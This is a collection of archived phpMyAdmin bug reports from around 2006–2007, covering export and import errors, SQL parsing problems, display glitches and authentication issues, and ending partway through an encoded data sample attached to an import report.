phpMyAdmin 2.9.0.2 Server version 4.1.21 standard MySQL client version 4.1.10 thank you, Joost Schouten Original URL https sourceforge.net p phpmyadmin bugs 2327 https sourceforge.net p phpmyadmin bugs 2327 Original author joostschouten","bug"
"24444","8691","Export Importing views.
When exporting a database 1) Views are not visable in export list request 1541189) and cannot be excluded from export; they re always included in export file.
2) When importing a file containing views depending on other views in same script gives errors due to dependencies.
If views could be isolated in export list and the view creation statement in the export file would be create or replace view ... in stead of create view ... one could import the view export file several times to re create all views.
Perhaps better solutions are available ...
Original URL https sourceforge.net p phpmyadmin bugs 2326 https sourceforge.net p phpmyadmin bugs 2326 Original author zon 0 net Found in version 2.9.1.1","bug"
"24444","8692","pma 2.10 in IE6 the SQL window has only 1 line.
if i call http pma.cihar.com trunk config db sql.php?db=test with IE6 i only get one line for entering sql queries.
FF is ok) in http pma.cihar.com STABLE db sql.php?db=test IE6 works like intended.
Original URL https sourceforge.net p phpmyadmin bugs 2328 https sourceforge.net p phpmyadmin bugs 2328 Original author windkiel Found in version Latest Git","bug"
"24444","8693","Multiple problems with , comma) as an enum value.
There are some problems with xc2xab,xc2xbb the comma sign) in an enum field, here s an example CREATE TABLE `DOMAINS` `DOM JOIN` enum , , .
, , , ) NOT NULL default ) ENGINE=MyISAM DEFAULT CHARSET=utf8; Here is a list of the errors the Structure tab shows DOM JOIN enum , , .
, utf8 general ci an edition of a row shows DOM JOIN enum a checkbox here, alone, with no value) the Export tool returns a strange character `DOM JOIN` enum , , .
, xefxbfxbd , ) NOT NULL default , Can you help me on this ?
Thanks.
Original URL https sourceforge.net p phpmyadmin bugs 2329 https sourceforge.net p phpmyadmin bugs 2329 Original author blade1o6 Found in version 2.9.1.1","bug"
"24444","8694","Too much quoting on import.
While importing our script for creating phpMyAdmin tables, pma is quoted to many times This user amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;quot;pma amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;quot; must be defined in config.inc.php controluser controlpass) Original URL https sourceforge.net p phpmyadmin bugs 2330 https sourceforge.net p phpmyadmin bugs 2330 Original author nijel Found in version Latest Git","bug"
"24444","8695","Ugly font in EDIT box for TEXT field.
I have a simple table with a VARCHAR field, a TIMESTAMP field, and a TEXT field.
In BROWSE mode, the contents of all fields are displayed in a nice smooth, antialiased font.
But if I EDIT a record, the value box for the text field is displayed in a primitive bitmapped font.
Other fields are displayed nicely.
This is especially bad if you scale the font size on the home page popup) to something other than 100 .
For example, if you set size to 80 , the contents of the TEXT VALUE box are almost unreadable due to attempted scaling of the bitmapped font.
Is it possible to use a scaleable type font in the value area of TEXT fields?
Original URL https sourceforge.net p phpmyadmin bugs 2331 https sourceforge.net p phpmyadmin bugs 2331 Original author roblewis Found in version 2.9.1","bug"
"24444","8696","UNIQUE and INDEX keys should not both be set.
UNIQUE and INDEX keys CAN both be set for a column and you should NOT delete the additional keys that phpmyadmin implies suggests !)
similar to [ 1083301 ] More than one INDEX key was created for column [ 1482401 ] PRIMARY and INDEX keys should not both be set for column CREATE TABLE `mytab` `c` tinyint 4) default NULL, `d` tinyint 4) default NULL, UNIQUE KEY `idxc` `c`), KEY `idxcd` `c`,`d`) ) ENGINE=MyISAM Original URL https sourceforge.net p phpmyadmin bugs 2332 https sourceforge.net p phpmyadmin bugs 2332 Original author osde info Found in version 2.8.1","bug"
"24444","8697","Detecting missing permissions on session directory.
I am a moderator from russian speaking forum about phpMyAdmin http forum.php myadmin.ru .
Our user have a problem that we can t help him to solve.
4.11 STABLE FreeBSD mysql Ver 14.7 Distrib 4.1.22, for portbld freebsd4.11 i386) using readline 5.2 PHP 4.4.4 with Suhosin Patch 0.9.5 cgi fcgi) built Oct 18 2006 07 26 28) phpMyAdmin xe2x80x93 2.8.2.4 2.9.1.1) Trying to create a table have a message The field count is empty!
.
Working on this problem shows us that some POST elements disapears in this part of code.
.
libraries common.lib.php if !isset REQUEST[ token ]) || SESSION[ PMA token ] != REQUEST[ token ]) \{ List of parameters which are allowed from unsafe source allow list = array db , table , lang , server , convcharset , collation connection , target , Session ID phpMyAdmin , Cookie preferences pma lang , pma charset , pma collation connection , pma convcharset , Possible login form pma username , pma password , ); keys = array keys REQUEST); Remove any non allowed stuff from requests foreach keys as key) \{ if !in array key, allow list)) \{ unset REQUEST[ key]); unset GET[ key]); unset POST[ key]); unset GLOBALS[ key]); \} else \{ allowed stuff could be compromised so escape it REQUEST[ key] = htmlspecialchars REQUEST[ key], ENT QUOTES); \} \} \} Commenting every unset functions solve a problem but it s hard to test is everything works fine with this changes or not.
File tbl create.php.
String 219 PMA mysqlDie strTableEmpty, , , err url); Changed on PMA mysqlDie strTableEmpty .
\ num fields = \{ num fields\}.
, , , err url); This change shows empty num fields.
File libraries common.lib.php, string 2881 havd been added element num fields to array allow list.
With this change script works fine with first part of creation of the table but shows The field count is empty!
again when we trying to create fields.
I see that it is probably not a phpMyAdmin problem but may be someone have any ideas?
There was this kind of problem in this thread http sourceforge.net tracker index.php?func=detail aid=1597047 group id=23067 atid=377409 but nobody could clear this out.
Thanks a lot.
Original URL https sourceforge.net p phpmyadmin bugs 2333 https sourceforge.net p phpmyadmin bugs 2333 Original author hanut Found in version Latest Git","bug"
"24444","8698","Left hand table highlighting not de highlighting.
There is a small error in the highlighting of selected table in the left hand column.
When a table is selected and so highlighted orange), and then the database name is selected in the left hand column to show the database overview in the main pane), the table name is not de highlighted on the left.
Selecting another table on the left then highlights the new table name as well as leaving the old one highlighted, thus it is possible to highlight all the tables in the left hand column!
Original URL https sourceforge.net p phpmyadmin bugs 2337 https sourceforge.net p phpmyadmin bugs 2337 Original author confuzzledduck Found in version 2.9.2","bug"
"24444","8699","exporting multiple foreign keys for one table.
When exporting tables with more than one foreign key constraint, the syntax is not correct.
It looks like this then Constraints for table `jungfilmer ratings` ALTER TABLE `jungfilmer ratings` ADD CONSTRAINT `ratings ref userId` FOREIGN KEY `ref userId`) REFERENCES `jungfilmer users` `id`), ALTER TABLE `jungfilmer ratings` ADD CONSTRAINT `ratings ref userId` FOREIGN KEY `ref userId`) REFERENCES `jungfilmer users` `id`), ADD CONSTRAINT `ratings ref videoId` FOREIGN KEY `ref videoId`) REFERENCES `jungfilmer videos` `id`); Obviously, the first two lines are simply not needed.
phpMyAdmin version 2.9.0.3 MySQL Server version 5.0.27 PHP Version 5.2.0 Original URL https sourceforge.net p phpmyadmin bugs 2334 https sourceforge.net p phpmyadmin bugs 2334 Original author jacomac Found in version 2.9.0.3","bug"
"24444","8700","Superfluous slash in db names with underscore.
See the screen, please.
This bug appears in versions gt; 2.9.0.2.
Original URL https sourceforge.net p phpmyadmin bugs 2335 https sourceforge.net p phpmyadmin bugs 2335 Original author hanut","bug"
"24444","8701","wrong reserved word recognition.
hi folks I get an error when I run an query in phpmyadmin, the same sentence in a php script or console works perfectly Some interesting information Linux entel 2.6.19.dic5 entel 1 Tue Dec 5 15 49 34 CLST 2006 i686 GNU Linux localhost Server version 5.0.24a Debian 9 log Protocol version 10 Server Localhost via UNIX socket User root localhost MySQL charset UTF 8 Unicode utf8) phpMyAdmin 2.9.1.1 2.9.2 MySQL client version 5.0.24a Used PHP extensions mysql The query look this IN PHPMYADMIN Select c.id as empresa id, c.empresa as empresa nombre, g.id as guia id, g.comprador as guia comprador id, g.numero guia, gd.numero guia, gd.producto as gd producto id, SUM gd.cantidad) as cantidad C, p.id as producto id, p.nombre, p.precio from clientes as c, guias as g, guias datos as gd, productos as p where c.id = 32 and c.id = g.comprador and gd.numero guia = g.numero guia and gd.producto=p.id and g.lock= 1 GROUP BY gd.producto Error SQL query Documentation SELECT c.id AS empresa id, c.empresa AS empresa nombre, g.id AS guia id, g.comprador AS guia comprador id, g.numero guia, gd.numero guia, gd.producto AS gd producto id, SUM gd.cantidad ) AS cantidad C, p.id AS producto id, p.nombre, p.precio FROM clientes AS c, guias AS g, guias datos AS gd, productos AS p WHERE c.id = 32 AND c.id = g.comprador AND gd.numero guia = g.numero guia AND gd.producto = p.id AND g.lock = 1 GROUP BY gd.producto LIMIT 0 , 30 MySQL said Documentation 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near lock = 1 GROUP BY gd .
producto LIMIT 0, 30 at line 1 IN CONSOLE Database changed mysql gt; Select c.id as empresa id, c.empresa as empresa nombre, g.id as guia id, g.comprador as guia comprador id, g.numero guia, gd.numero guia, gd.producto as gd producto id, SUM gd.cantidad) as cantidad C, p.id as producto id, p.nombre, p.precio from clientes as c, guias as g, guias datos as gd, productos as p where c.id = 32 and c.id = g.comprador and gd.numero guia = g.numero guia and gd.producto=p.id and g.lock= 1 GROUP BY gd.producto; | empresa id | empresa nombre | guia id | guia comprador id | numero guia | numero guia | gd producto id | cantidad C | producto id | nombre | precio | | 32 | AMD Corporation.
| 1 | 32 | 40851 | 40851 | 1 | 10549 | 1 | Pan | 420 | 1 row in set 0.00 sec) mysql gt; When I run the same sentence without and g.lock = 1 works fine under phpmyadmin Like this.
Select c.id as empresa id, c.empresa as empresa nombre, g.id as guia id, g.comprador as guia comprador id, g.numero guia, gd.numero guia, gd.producto as gd producto id, SUM gd.cantidad) as cantidad C, p.id as producto id, p.nombre, p.precio from clientes as c, guias as g, guias datos as gd, productos as p where c.id = 32 and c.id = g.comprador and gd.numero guia = g.numero guia and gd.producto=p.id GROUP BY gd.producto ; maybe phpmyadmin recognize lock such as internal reserved word ?
See this ALTER TABLE `guias` CHANGE `lock` `l` INT 2 ) NOT NULL I changued lock to l , then I try the query with and g.l = 1 of course)... and it s works!
I did an exclusive database and table to try this.
CREATE DATABASE `bug` ; CREATE TABLE `bug` `id` MEDIUMINT 10 ) NOT NULL AUTO INCREMENT PRIMARY KEY , `name` VARCHAR 255 ) NOT NULL , `lock` MEDIUMINT 10 ) NOT NULL ) ENGINE = MYISAM ; INSERT INTO `bug` `id` , `name` , `lock` ) VALUES NULL , nicolas , 1 ), NULL , nicolas2 , 1 ); PHPMYADMIN SQL query Documentation SELECT b.id, b.name, b.lock FROM bug AS b WHERE b.lock =1 LIMIT 0 , 30 MySQL said Documentation 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near lock FROM bug as b where b .
lock = 1 LIMIT 0, 30 at line 1 CONSOLE mysql gt; use bug Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with A Database changed mysql gt; SELECT b.id,b.name,b.lock FROM bug as b where b.lock = 1; | id | name | lock | | 1 | nicolas | 1 | | 2 | nicolas2 | 1 | 2 rows in set 0.00 sec) mysql gt; SELECT FROM `bug` WHERE 1 LIMIT 0 , 30 works in phpmyadmin SELECT FROM `bug` WHERE lock = 1 does not work in phpmyadmin SELECT name,lock FROM bug does not work in phpmyadmin SELECT lock FROM `bug` WHERE lock = 1 does not work in phpmyadmin UPDATE The source code of generated page shows lt;span class= syntax gt; lt;span class= syntax alpha syntax alpha reservedWord gt;SELECT lt; span gt; lt;span class= syntax alpha syntax alpha reservedWord gt;LOCK lt; span gt; I think that phpmyadmin can not recognize when lock its the name of a field or is a reserved word UPDATE phpMyAdmin 2.9.2 all languages utf 8 only have the same bug sorry for my english Salduos desde Chile!
Original URL https sourceforge.net p phpmyadmin bugs 2336 https sourceforge.net p phpmyadmin bugs 2336 Original author entel Found in version 2.9.2","bug"
"24444","8702","Security patches are not being published.
phpMyAdmin s security team does not publish patches which fix critical security issues.
Instead, new releases are being published, which fix several other bugs or even add new features.
This makes it hard to distributions to push security updates of PMA fast, since they a) have to find out which things fixed the security issue and to run exploits against the patched PMA b) have to update to a new PMA version, which requires a lot of testing Besides of new releases, the PMA security team should publish patches.
Original URL https sourceforge.net p phpmyadmin bugs 2341 https sourceforge.net p phpmyadmin bugs 2341 Original author webpirat","bug"
"24444","8703","Error 1264 importing NULL values in MySQL 5.0.
Trying to import NULL value into a NULL column, in a table in MySQL 5.0, results in error 1264 Out of range value adjusted for column... .
Software setup Apache v1.3.33, MySQL v5.0.27 Community Essential, PHP v5.0.5, and phpMyAdmin v2.8.1 also confirmed in v2.9.1.1).
Steps to produce error Started Apache and phpMyAdmin, and logged into server localhost and database test.
CREATE TABLE table i1 INT, i2 INT, i3 INT ) INSERT INTO table VALUES 1, NULL, 1 ), 2, NULL, 2 ) SELECT FROM table | i1 | i2 | i3 | | 1 | NULL | 1 | | 2 | NULL | 2 | Using phpMyAdmin, exported table to table.txt 1|NULL |1 2|NULL |2 Tried to import same file back in.
Get error 1264 Out of range value adjusted for column i2 at row 1 .
Switching back to MySQL v4.1.12a or MySQL v4.1.22 both tested) eliminates the error.
Problem not found in MySQL v4.x or v5.x when doing SELECT INTO OUTFILE and LOAD DATA INFILE, or any other non phpMyAdmin exporting and importing of data.
Only seen using phpMyAdmin.
Original URL https sourceforge.net p phpmyadmin bugs 2338 https sourceforge.net p phpmyadmin bugs 2338 Original author coder4hire Found in version 2.9.2","bug"
"24444","8704","Too many htmlentities ) calls on partial result descriptions.
Special chars like non breaking spaces) in explanations of partial results are escaped via htmlentities ) one time too often this results in e.g.
Ihr SQL Befehl wurde erfolgreich ausgefxc3xbchrt.
[SQL Befehl ] DROP TABLE IF EXISTS ` ` ; MySQL lieferte ein leeres Resultat zurxc3xbcck d. amp;nbsp;h. null Zeilen).
CREATE TABLE IF NOT EXISTS ` ` ... ) TYPE = MYISAM COMMENT = ; MySQL lieferte ein leeres Resultat zurxc3xbcck d. amp;nbsp;h. null Zeilen).
Note the d. amp;nbsp;h. should be d. h. instead.
Original URL https sourceforge.net p phpmyadmin bugs 2339 https sourceforge.net p phpmyadmin bugs 2339 Original author ligh1l Found in version 2.9.2","bug"
"24444","8705","cfg[ Order ] = SMART overwritten.
setting cfg[ Order ] = SMART ; in config.inc always results in ORDER BY ... DESC in all field header links, regardless of the type of the field.
After the first browsing GLOBALS[ cfg ][ Order ] and the corresponding value in SESSION) is changed to DESC .
Original URL https sourceforge.net p phpmyadmin bugs 2340 https sourceforge.net p phpmyadmin bugs 2340 Original author windkiel Found in version 2.10.0 beta1","bug"
"24444","8706","Export from SQL queries that contain functions fails.
Hi, phpMyAdmin 2.9.2 MySQL client version 5.0.21 Server version 5.0.21 Debian 3ubuntu1 log It appears the the export function from the sql.php page when used with SQL that contains functions does not work correctly.
For example SELECT c.id, isrc, ub.type, SUM ubi.price ) AS TotalPrice, ub.currency FROM user basket ub JOIN user basket item ubi ON ub.id = ubi.basket id JOIN content c ON ubi.content id = c.id WHERE date purchased gt; 2006 10 01 AND date purchased lt; 2006 12 31 GROUP BY c.id, currency, ub.type Works fine up until the point where the the output format is chosen and go is pressed.
The provided document in this case provides the following error 1305 FUNCTION testdatabase.SUM does not exist This error is generated because phpMyAdmin adds a space between the SUM function name and the brackets; SUM ubi.price ) instead of SUM ubi.price ) which MySQL does not like.
However, I have found a solution, although a bit long winded 1\.
Click export as per normal from the results page after executing the SQL query.
2\.
In the export page, where you select the type of file, click edit to alter the SQL.
3\.
Remove the spaces from the query for the functions in question and click go.
4\.
In the SQL results page click export again.
5\.
Select the type of document you want and click go.
That should export the data to the format of your choosing.
I hope this helps fix the issue.
Cheers, sam Original URL https sourceforge.net p phpmyadmin bugs 2345 https sourceforge.net p phpmyadmin bugs 2345 Original author muelas Found in version 2.9.2","bug"
"24444","8707","Only variables can be passed by reference.
PHP Fatal error Only variables can be passed by reference in usr local htdocs phpMyAdmin MySQL5 libraries relation.lib.php on line 341, referer https db.local phpMyAdmin MySQL5 navigation.php?server=3 db=billing system table= lang=en utf 8 collation connection=latin1 swedish ci PHP Stack trace , referer https db.local phpMyAdmin MySQL5 navigation.php?server=3 db=billing system table= lang=en utf 8 collation connection=latin1 swedish ci PHP 1.
\{main\} ) usr local htdocs phpMyAdmin MySQL5 sql.php 0, referer https db.local phpMyAdmin MySQL5 navigation.php?server=3 db=billing system table= lang=en utf 8 collation connection=latin1 swedish ci PHP 2.
PMA displayTable ) usr local htdocs phpMyAdmin MySQL5 sql.php 722, referer https db.local phpMyAdmin MySQL5 navigation.php?server=3 db=billing system table= lang=en utf 8 collation connection=latin1 swedish ci PHP 3.
PMA getForeigners ) usr local htdocs phpMyAdmin MySQL5 libraries display tbl.lib.php 1812, referer https db.local phpMyAdmin MySQL5 navigation.php?server=3 db=billing system table= lang=en utf 8 collation connection=latin1 swedish ci Original URL https sourceforge.net p phpmyadmin bugs 2342 https sourceforge.net p phpmyadmin bugs 2342 Original author em gotcha Found in version 2.10.0 beta1","bug"
"24444","8708","slashes are not escaped properly.
I got table wit two varchar columns CREATE TABLE `pattern` `expression` varchar 200) NOT NULL default , `comment` varchar 30) default , PRIMARY KEY `expression`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; and data like this INSERT INTO `pattern` `expression`, `comment`) VALUES .
r=.
foo\\.cz.
, chcou spam ), .
r=.
bar\\.cz.
, chcou spam ), , .
r=.
foobar\\.cz.
); when i try to modify any value phpmyadmin returns back to page vith data preview without modification of data and with no error.
Think that the problem will be with escaping characters.
Gentoo linux mysql Ver 14.12 Distrib 5.0.26, for pc linux gnu x86 64) using readline 5.1 compiled from sources phpMyAdmin 2.10.0 beta1 Firefox 1.5.0.4 for Linux compiled from sources Original URL https sourceforge.net p phpmyadmin bugs 2347 https sourceforge.net p phpmyadmin bugs 2347 Original author yann649 Found in version 2.10.0 beta1","bug"
"24444","8709","different mysql library and server version.
If i edit, or insert on a table with a varbinary field, the HTML input box is always 4 characters long.
To test it, create this table and try to insert a row CREATE TABLE `vbtest` `id` int 10) unsigned NOT NULL auto increment, `whatever` varbinary 255) NOT NULL, PRIMARY KEY `id`) ) ENGINE=MyISAM DEFAULT CHARSET=latin1 AUTO INCREMENT=1 ; Original URL https sourceforge.net p phpmyadmin bugs 2343 https sourceforge.net p phpmyadmin bugs 2343 Original author em gotcha Found in version 2.10.0 beta1","bug"
"24444","8710","Designer and Mac OSX.
The scroll bars on the designer page are appearing across the middle of the Designer screen, see attachment Firefox 2.0.0.1 Camino 1.0.3 Original URL https sourceforge.net p phpmyadmin bugs 2344 https sourceforge.net p phpmyadmin bugs 2344 Original author timpea Found in version 2.10.0 rc1","bug"
"24444","8711","[MSIE] error.ico url problem.
Windows XP Home Apache 2.2.4 MySQL 5.0.27 PHP 5.2.0 phpMyAdmin 2.9.2 Using MSIE7, In Apache error.log I see this error [Mon Feb 05 00 11 25 2007] [error] [client 127.0.0.1] File does not exist C apache localhost www themes, referer http localhost phpmyadmin db details structure.php?server=1 db=mysql table= lang=en utf 8 collation connection=utf8 unicode ci themes original css theme right.css.php line 624 and themes darkblue orange css theme right.css.php line 652 cursor url .. lt;?php echo SESSION[ PMA Theme ] gt;getImgPath ); ?
gt;error.ico), default; Changed to cursor url .
lt;?php echo SESSION[ PMA Theme ] gt;getImgPath ); ?
gt;error.ico ), default; It solves the problem with the path error but I still do not understand why double dot is there?
Searching I found this css phpmyadmin.css.php line 370 cursor url lt;?php echo GLOBALS[ cfg ][ ThemePath ]; ?
gt; original img error.ico), url .. lt;?php echo GLOBALS[ cfg ][ ThemePath ]; ?
gt; original img error.ico), default; Hmm...
Here we are trying to find error.ico in the theme path and if it s not there down the level otherwise default cursor.
Nice, but I still don t see any reason why double dot is there?
And I have to say that this cursor looks horrible, IE resample it from 16x16 to 32x32.
This giant monster frightens me.
Last but not least do we really need this cursor?
Where is it helpfull?
I saw it only under greyed menu tabs where it s not necessary.
Original URL https sourceforge.net p phpmyadmin bugs 2346 https sourceforge.net p phpmyadmin bugs 2346 Original author hanut","bug"
"24444","8712","browsing highlight disabling doesn t work.
the following configuration options don t seem to work for disabling mouseover background highlighting disabling and disabling selected row highlighting.
I also setup a dozen other configuration options manually editing the config file and all else so far worked.
cfg[ BrowsePointerEnable ] = FALSE Whether to activate the browse pointer or not.
cfg[ BrowseMarkerEnable ] = FALSE Whether to activate the browse marker or not.
Original URL https sourceforge.net p phpmyadmin bugs 2348 https sourceforge.net p phpmyadmin bugs 2348 Original author merc444 Found in version 2.9.2","bug"
"24444","8713","Problems on Windows Vista.
hi, i have already used phpmyadmin before and when i install phpmyadmin 2.9.2 on my vista computer with IIS7 and ie7 firefox2.0.0.1, i have some trouble to use this version first, when i see main page, graphics are disappear !
only links second, some links dont work modify user privileges,... third, when i want to add table on mysql base,i put name and number of fields, but when i push OK button, phpmyadmin ask me to enter number of fields so i think my installation is not OK but i follow the same installation of phpmyadmin old version on XP Original URL https sourceforge.net p phpmyadmin bugs 2349 https sourceforge.net p phpmyadmin bugs 2349 Original author seb bonnet Found in version 2.9.2","bug"
"24444","8714","Use of PHP short tags.
I noticed this when I tried to use the new Designer feature; a couple of files use short tags lt;?
).
This causes problems with some setups such as mine) which have short open tag set to Off.
Files pmd general.php lines 160 and 180 pmd pdf.php lines 56 and 75 pmd save pos.php line 56 Original URL https sourceforge.net p phpmyadmin bugs 2350 https sourceforge.net p phpmyadmin bugs 2350 Original author bunrawr Found in version 2.10.0 beta1","bug"
"24444","8715","Missing column type geometry .
The column type for spatial data is geometry .
The form to enter new columns doesn t offer this option in the Type menu.
Maybe this is rather a feature request?
Anyways, it s not possible to create a spatial column with phpMyAdmin, except if I type the SQL code by hand.
Original URL https sourceforge.net p phpmyadmin bugs 2351 https sourceforge.net p phpmyadmin bugs 2351 Original author bonzon Found in version Latest Git snapshot","bug"
"24444","8716","Spatial functions not supported.
Some all?)
functions from the MySQL spatial extension lead to parse errors.
A query like SELECT Contains geo, GeomFromText POINT 539050 182550) )) FROM country Gives error 1305 FUNCTION test1.GeomFromText does not exist The same query with the PHP MySQL client or the MySQL Query Browser works fine.
Original URL https sourceforge.net p phpmyadmin bugs 2352 https sourceforge.net p phpmyadmin bugs 2352 Original author bonzon Found in version Latest Git snapshot","bug"
"24444","8717","cfg[ SQLQuery ] options not documented.
cfg[ SQLQuery ][ ShowAsPHP ] is not mentioned in the documentation shipped with phpMyAdmin checked with SVN trunk in SVN repository).
It is, however, already mentioned in the wiki.
Original URL https sourceforge.net p phpmyadmin bugs 2353 https sourceforge.net p phpmyadmin bugs 2353 Original author ci dev Found in version Latest Git","bug"
"24444","8718","Cookie auth PHP 5.2.1 64 bit.
I have upgraded my PHP to version 5.2.1 and cookie authentication stopped working.
The behaviour is really strange.
Sometimes when I supply a valid username and password I can login but get logged out after loading a few phpmyadmin pages.
Sometimes I cannot login with the error message that user wwwrun my Apache daemon user) is not allowed to access MySQL server, although I supplied completely different username.
Sometimes it says that the user I supplied cannot access the database but after 3 5 retries with the same username and password I can login.
Reverting back to PHP 5.2.0 with the same phpmyadmin config file and the same php.ini file removes the problem.
There are some security fixes in PHP 5.2.1 http www.php.net releases 5 2 1.php) so it seems to be that they are affecting the behaviour.
This problem also affects phpmyadmin 2.9.2.
For now I have switched to HTTP based authentication, but hopefully there is a fix for this problem soon.
Original URL https sourceforge.net p phpmyadmin bugs 2354 https sourceforge.net p phpmyadmin bugs 2354 Original author unclef Found in version 2.10.0 rc1","bug"
"24444","8719","Cookies have to be deleted on upgrade.
Setup RedHat Enterprise Linux 3 PHP 4.3.2 Mysql client 3.23.58 Server 4.1.8 phpMyAdmin 2.6.1 pl2 We want to upgrade to phpMyAdmin 2.9.1.1 We use cookie based authorization.
But after the upgrade we can t login until we delete all the cookies in the browser.
This makes this upgrade difficult to support so we like a sollution on the server side.
Original URL https sourceforge.net p phpmyadmin bugs 2355 https sourceforge.net p phpmyadmin bugs 2355 Original author marceln Found in version 2.9.1.1","bug"
"24444","8720","Memory Error BLOB browsing).
Script runs out of memory while listing large BLOB fields... Screenshot should show everything...
Original URL https sourceforge.net p phpmyadmin bugs 2356 https sourceforge.net p phpmyadmin bugs 2356 Original author nymphonics Found in version Latest Git","bug"
"24444","8721","Export data to XML codepage.
On fist page of phpMyAdmin i have selected Language xc4x8cesky Czech win1250).
If i use data export to XML format, i get XML file with header lt;?xml version= 1.0 encoding= windows 1250 ?
gt; but real codepage of document is ISO 8895 2, but not Win1250 as i have selected.
Original URL https sourceforge.net p phpmyadmin bugs 2357 https sourceforge.net p phpmyadmin bugs 2357 Original author radstar Found in version 2.9.2","bug"
"24444","8722","Importing MS Access database reports possible bug.
phpMyADmin 2.9.2 English MySQL Server Version 5.0.19 nt PHP 5.1.2 Windows XP IIS 5.1 MS Access 2002 10.6771.6825) SP3 Create New Database Rota Collation Creates OK Import Browse Select File Compatability=None utf 8 GO Partial import = ON Skip 0 Causes There is a chance you have discovered an error ib the SQ Parser... No problem importing with Navicat 7.2.4 Data section below BEGIN CUT eNrtXQt0G9WZvjMavUY6GtlJHDsJiTiERxJbsR3jOM7Zg63YSSwsy7ZsEidUiR3JifyOHyEGTuN1 DyVwuiktTQtL2ACF7eaUhUIKWyA93aa0PSxQOCwsLXsWCiws72VtujwT739f0kgjOc7iRgm937Vn vnv3P 5z5m5v vzKi2uTnYXOlZV JZV qpr22o9BR7Sjzl5WWlJWqoBXKQqq67IlTpWVoXqfQM 7e4ZaB8cig56e2Id3oFdA541q0pWe0qLi8uLiiuKSso9Jasry0ori0u2eHqivWs8S9XAaKipvtJz qbfYW7KmqG9YbQ01e4KhQk 1htqGlkLPFbWgZFOsz1NX6yn3FquNgepKT6l3jbdUbdzYiLMLgyFc vsRb6tlU19DQotZXN2yo9ET7ikaGO4sqVCIfSQiFhtv7Iu2DEY8 Ouyp8WEWeqjP1LHdfrz17SM7 B6suQ4e fvimqev tuTXo4 X3zsladu3 GH zV4fWf33isoaDnvdXH XQZ21PXPLmt86 cfuT pmvKu9545YG3dsxZ11jxwKof oVvWi3SP9w2uvXX7 s9fealtyywn Re29A2vfee6Wp8c7tx38 5Nkbll638zdLLq557oNnou9PWX 7 s69ec733y7qeL7FglCZtxgJCAgICAgICAgICAgIzA5s0nEZ PD R kKTJEU0ifUFGT2m7dHEmBAQEBAQEBAQEBAQEBAQOIsxJqNffjZ1mpCllx248AIFoTYLQnzG XUoRHspBDpSDZBImAMCukoVmVep247QTy7IjE5B2kJwb34Fk2IiM5AwbzlCIXpwxhzBV2JVkmFMy ciFDwRnWuCiasQBkqDhDBSJZx0mJlKBIlMBaHbSE1WAVyXBDVtoMDQ4xbYYLzEvNIFbJceUJq w4 wxI wNJkc6UUcxVurhO3QYoOIsoBtZWqw4QzTCmViJvBhdahftQHKYp2oGE41hrUDut21AH Q8Cd yzhR2HMQlpROcFvRAIowWkXrUQ QO6FkHtD9pEQMtvtQA B7YUtBdbC gurRHtCOl7VoL5QehHw3 2Q5AuQgaAUlROErMaYTcftBji0tRURBdRawehFKNwMWa kAOlp6HmmEvTPehTihZT45xJ8pP4YfQ LmLjMEhuQaOgIYq YcWVLslImppCaf cpN9R DVZfoNsZiwAfzmk2 vL8MYlDYyHImldReJ5cSTy WAfAR5hvOGZeM3ak4AFDhxluddK1bXg8kr7swh2XdF4nziG9FS8dtE hY7NgpeKEKiAgICAgICAg IPBVgywdceF1UKJex4FM j92zZW4w5ILu85hTsoa7kZTB1cyuKtSOucTy8noj9uTPV qElvBj7Wg anBDA D rCdO3C7iAMaYw4odRjc4hh2oi7mz2DGygJtXB 5qipNm17lnytRULhBzSdACgY5htB d yhEzahJOk4CAgICAgICAgICAgMBZ6 iye3kSonO7sG 98Gbrkt7v Pg13zLCmi0k9XS3TO35z6 MABQJjrzrSSVMCOZT 0nZ1j51H4ilMBEnTwpqfTxAdmQMX2MwTAfDyVyif8 TOIKHWiETXfjSeoB MuE6BClGJpRt8enu1IlsNT4dW6KjS9PEDPBE9iCscRyDRSh0s899ZHk1WXbCsoBM5iLYO6KbRk4T oSDtQD YFBpPDwzmg9i8sW8r4CAgICAgICAgICAwFc9CPCkE6 LTNSfVDMHAczg9GJHHv8vgF0X Mvdzrm43vUfq5v52pocD2EPuksE V9I ss5iAGbDKwTxGICUPsOa5oUAlQYgTOkzUGpwADJc4EXv AOe BzznXtQHVbUTPOkO8giCC5b6PDcaQleT5 uTOXp fCnhNMNWJwkB4Oe5dxD3Xl8u8156WYvi e WQ5 FpkGII7QJqYAbPqC8iLw9QjJMlLqNMW Y88tR4ahnLtGUW67rYeDyIkeZZ Hhe LWTNHlp gh s5828rmdeiyI IiAgICAgICAgICBwTkOS2vj7zGgJ Qhgifae60euDtd5rt rN6sNql193LnP Wen8k Mnjm4H Yq 41X1kLpJzVWftu 3r7OftD1iG7attL1jvccqalRAQEBAQGDW4ZkNIe7ZEGKb 3QOryrIQRfStPw kWZT15RppbDaESLNwGGOzX8s26WwRkmV3BjqcUoWfjy2 ozSrQgQETvOSpWRJ iCJ9ZJenOX 78VLB9x5VmHLjlYQXCqVkckchs20PYpsKGUkKvWkhxT04303Y IsCuAib pXJXxVK zPd62LHIs3S 8heMffBv2ecPbm rwNXtunjftzE36O 1 wOBpu7uTn9rUzfJciey6v3djClRZigS 204ZDsrYHgn2h9k LsqKNYX9vW2Rju5NbZ00Q YZnZFYL2U5Kas7EGvrZCyVsfZ0gwTC0SgH7OAq EOZI 8CutsCufn YchdTbsAfbuoI mOEt4jygm3 1pif2VxAecAIMnnzKSccCUQoYwFlbO9MSD f scAwWlWR q1NAWa0LTVzZDu1fY4 g2kzJ3h6GUqCvau KdbG9rYk2MYqtdLMzrC o5cw5ukYCds9 lIsZbaG2ABVCcvISObGmQCQW7N3TyRTn06xYpLu3KZaauZBmdtcnlCxhrLbWDn YWh8ZYbvmMn6v PxTCjC6TjpEofl6cm7BuLubJ 2iVhv17Iv30KHMoH9dJsJ5wTJTT3b99uz 2p60jFCFsO2X3dzfF gk2hto6mYKKPmXT9J8WWIppPe4iuE3RJNIN0FH3nWEb5jJUibQXNJG2S0jDLdVlpinYxQ5MbLqXb X0L3YU2RoruQZeoaRddmXYhl40Ipqu2nymdrJdMOSia LbNQ4XsJCAgICAgICJxZKNK4M5P Lys2 t6dqDEkzJ0SFnoX P 